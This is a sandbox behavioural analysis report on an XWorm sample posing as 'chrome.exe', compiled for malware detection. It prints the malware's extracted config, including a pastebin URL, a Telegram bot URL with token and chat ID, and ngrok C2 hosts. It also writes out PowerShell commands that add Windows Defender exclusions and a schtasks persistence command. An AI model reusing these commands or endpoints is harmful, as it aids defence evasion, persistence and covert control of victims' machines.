Analysis
max time kernel: 597s
max time network: 599s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
submitted: 30-05-2024 14:51
Behavioral task: behavioral1
Sample: chrome.exe
Resource: win10-20240404-en
General
Target: chrome.exe
Size: 183KB
MD5: 2b26b084c03ef96db3cda61ec42b9780
SHA1: d285abb4911dbb747b8cc0fb61d90c424905d71f
SHA256: 21dcb388ee5eeb9ff54802794de0a765b7a4613d93dd6564694e88e48a75c798
SHA512: 9fff7138ce7101c78e67e2f41181876b67d76c134757c61e151af5ffbca647b6fe965d60a41666f0dabf3508e0c43f6a56126c048ffc00bfe5909221732d2271
SSDEEP: 3072:k0SK4dXl19I2pbXwo5MObaQ04NpVq8BxFRzaqF+o2GQJ7/JzqVfGvc:34dFI2pbgeM/gVqwlL
Malware Config
Extracted: xworm
Install_directory: %Userprofile%
install_file: USB.exe
pastebin_url: https://pastebin.com/raw/0hUbjRaB
telegram: https://api.telegram.org/bot7166866838:AAHZkNz5kuPxP-6aLkd_O3PTozWCCuLQp-w/sendMessage?chat_id=6817832744
Signatures
Detect Xworm Payload 2 IoCs
Processes:
  resource                                                                    yara_rule
  behavioral1/memory/3780-0-0x0000000000340000-0x0000000000374000-memory.dmp  family_xworm
  C:\Users\Admin\chrome                                                       family_xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
  pid   process
  4312  powershell.exe
  3860  powershell.exe
  192   powershell.exe
  5104  powershell.exe
Drops startup file 2 IoCs
Processes:
  description                   ioc                                                                                       process
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk  chrome.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk  chrome.exe
Executes dropped EXE 10 IoCs
Processes:
  pid   process
  2040  chrome
  3404  chrome
  2460  chrome
  3100  chrome
  4280  chrome
  2620  chrome
  3928  chrome
  4856  chrome
  1536  chrome
  4248  chrome
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
  description      ioc                                                                                                                                                  process
  Set value (str)  \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrome = "C:\\Users\\Admin\\chrome"  chrome.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
Processes:
  flow  ioc
  5     pastebin.com
  42    0.tcp.eu.ngrok.io
  80    0.tcp.eu.ngrok.io
  23    0.tcp.eu.ngrok.io
  51    0.tcp.eu.ngrok.io
  67    0.tcp.eu.ngrok.io
  72    0.tcp.eu.ngrok.io
  88    0.tcp.eu.ngrok.io
  96    0.tcp.eu.ngrok.io
  11    0.tcp.eu.ngrok.io
  40    0.tcp.eu.ngrok.io
  60    0.tcp.eu.ngrok.io
  90    0.tcp.eu.ngrok.io
  4     pastebin.com
  49    0.tcp.eu.ngrok.io
  65    0.tcp.eu.ngrok.io
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  1     ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
  pid   process
  192   powershell.exe
  192   powershell.exe
  192   powershell.exe
  5104  powershell.exe
  5104  powershell.exe
  5104  powershell.exe
  4312  powershell.exe
  4312  powershell.exe
  4312  powershell.exe
  3860  powershell.exe
  3860  powershell.exe
  3860  powershell.exe
  3780  chrome.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description                          pid   process
  Token: SeDebugPrivilege              3780  chrome.exe
  Token: SeDebugPrivilege              192   powershell.exe
  Token: SeIncreaseQuotaPrivilege      192   powershell.exe
  Token: SeSecurityPrivilege           192   powershell.exe
  Token: SeTakeOwnershipPrivilege      192   powershell.exe
  Token: SeLoadDriverPrivilege         192   powershell.exe
  Token: SeSystemProfilePrivilege      192   powershell.exe
  Token: SeSystemtimePrivilege         192   powershell.exe
  Token: SeProfSingleProcessPrivilege  192   powershell.exe
  Token: SeIncBasePriorityPrivilege    192   powershell.exe
  Token: SeCreatePagefilePrivilege     192   powershell.exe
  Token: SeBackupPrivilege             192   powershell.exe
  Token: SeRestorePrivilege            192   powershell.exe
  Token: SeShutdownPrivilege           192   powershell.exe
  Token: SeDebugPrivilege              192   powershell.exe
  Token: SeSystemEnvironmentPrivilege  192   powershell.exe
  Token: SeRemoteShutdownPrivilege     192   powershell.exe
  Token: SeUndockPrivilege             192   powershell.exe
  Token: SeManageVolumePrivilege       192   powershell.exe
  Token: 33                            192   powershell.exe
  Token: 34                            192   powershell.exe
  Token: 35                            192   powershell.exe
  Token: 36                            192   powershell.exe
  Token: SeDebugPrivilege              5104  powershell.exe
  Token: SeIncreaseQuotaPrivilege      5104  powershell.exe
  Token: SeSecurityPrivilege           5104  powershell.exe
  Token: SeTakeOwnershipPrivilege      5104  powershell.exe
  Token: SeLoadDriverPrivilege         5104  powershell.exe
  Token: SeSystemProfilePrivilege      5104  powershell.exe
  Token: SeSystemtimePrivilege         5104  powershell.exe
  Token: SeProfSingleProcessPrivilege  5104  powershell.exe
  Token: SeIncBasePriorityPrivilege    5104  powershell.exe
  Token: SeCreatePagefilePrivilege     5104  powershell.exe
  Token: SeBackupPrivilege             5104  powershell.exe
  Token: SeRestorePrivilege            5104  powershell.exe
  Token: SeShutdownPrivilege           5104  powershell.exe
  Token: SeDebugPrivilege              5104  powershell.exe
  Token: SeSystemEnvironmentPrivilege  5104  powershell.exe
  Token: SeRemoteShutdownPrivilege     5104  powershell.exe
  Token: SeUndockPrivilege             5104  powershell.exe
  Token: SeManageVolumePrivilege       5104  powershell.exe
  Token: 33                            5104  powershell.exe
  Token: 34                            5104  powershell.exe
  Token: 35                            5104  powershell.exe
  Token: 36                            5104  powershell.exe
  Token: SeDebugPrivilege              4312  powershell.exe
  Token: SeIncreaseQuotaPrivilege      4312  powershell.exe
  Token: SeSecurityPrivilege           4312  powershell.exe
  Token: SeTakeOwnershipPrivilege      4312  powershell.exe
  Token: SeLoadDriverPrivilege         4312  powershell.exe
  Token: SeSystemProfilePrivilege      4312  powershell.exe
  Token: SeSystemtimePrivilege         4312  powershell.exe
  Token: SeProfSingleProcessPrivilege  4312  powershell.exe
  Token: SeIncBasePriorityPrivilege    4312  powershell.exe
  Token: SeCreatePagefilePrivilege     4312  powershell.exe
  Token: SeBackupPrivilege             4312  powershell.exe
  Token: SeRestorePrivilege            4312  powershell.exe
  Token: SeShutdownPrivilege           4312  powershell.exe
  Token: SeDebugPrivilege              4312  powershell.exe
  Token: SeSystemEnvironmentPrivilege  4312  powershell.exe
  Token: SeRemoteShutdownPrivilege     4312  powershell.exe
  Token: SeUndockPrivilege             4312  powershell.exe
  Token: SeManageVolumePrivilege       4312  powershell.exe
  Token: 33                            4312  powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
  pid   process
  3780  chrome.exe
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
  description                        pid   process     target process
  PID 3780 wrote to memory of 192    3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 192    3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 5104   3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 5104   3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 4312   3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 4312   3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 3860   3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 3860   3780  chrome.exe  powershell.exe
  PID 3780 wrote to memory of 756    3780  chrome.exe  schtasks.exe
  PID 3780 wrote to memory of 756    3780  chrome.exe  schtasks.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\chrome.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3780
  Child processes:
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\chrome.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:192
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'chrome.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5104
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\chrome'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'chrome'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3860
  - C:\Windows\System32\schtasks.exe
    Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "chrome" /tr "C:\Users\Admin\chrome"
    - Creates scheduled task(s)
    PID:756
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:2040
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:3404
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:2460
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:3100
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:4280
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:2620
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:3928
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:4856
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:1536
- C:\Users\Admin\chrome
  Command line: C:\Users\Admin\chrome
  - Executes dropped EXE
  PID:4248
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 654B
  MD5: 16c5fce5f7230eea11598ec11ed42862
  SHA1: 75392d4824706090f5e8907eee1059349c927600
  SHA256: 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
  SHA512: 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
- Filesize: 3KB
  MD5: ad5cd538ca58cb28ede39c108acb5785
  SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
- Filesize: 1KB
  MD5: 68a1eec0cc923c6e7d7b83422ffc08b4
  SHA1: 4091f5622f97103d0501f220452699cdf329cb35
  SHA256: 26e337536d5aaa4683bb85e317778d02954eb076a4898f8e8a1a38c0c70c423a
  SHA512: 42e55d34ad8e0a65e5f00ce26c9b0e6c914278c8d03cece7ddbb2fef0ee0a7c229547acd7ca9ed6e54df545c8f28b6b982c28b9b45eb0aff723bcd440ba91980
- Filesize: 1KB
  MD5: 9ab0d79b6ea2fb17b006c4c2c5c05084
  SHA1: 238d7803bf6d67dfd6cb45d4c3f4a20a804f230a
  SHA256: 7ebbda07e65800a519800abfbbcafa1af50cff28db3674b0b2ae9361674fc156
  SHA512: 4ffb6af87dbb9c102c062c95e843c25c97bf8f8d616863347d3d58f6eb7cfabe4aa2d848c3dfb421558aaeb0ea069820fe5f480f97e4576bcceb4324c830eb6b
- Filesize: 1KB
  MD5: 62c8561f755430780a652d626c597227
  SHA1: c30910319267f5bd2942d20334f29f8117788a2f
  SHA256: e2ef29f0c46e5e534cf2e39c70f9be50ba0fc248b009015c1d768a7892c6b75b
  SHA512: 12e52c18417f2b77db9d34f9b043cc962c3806ecf7ddd2f915280d173a0803e6a880cf5f6243bbd65cbe377a52d335f704d0b0cb38f48d2defe6752aaf72d3b8
- Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- Filesize: 183KB
  MD5: 2b26b084c03ef96db3cda61ec42b9780
  SHA1: d285abb4911dbb747b8cc0fb61d90c424905d71f
  SHA256: 21dcb388ee5eeb9ff54802794de0a765b7a4613d93dd6564694e88e48a75c798
  SHA512: 9fff7138ce7101c78e67e2f41181876b67d76c134757c61e151af5ffbca647b6fe965d60a41666f0dabf3508e0c43f6a56126c048ffc00bfe5909221732d2271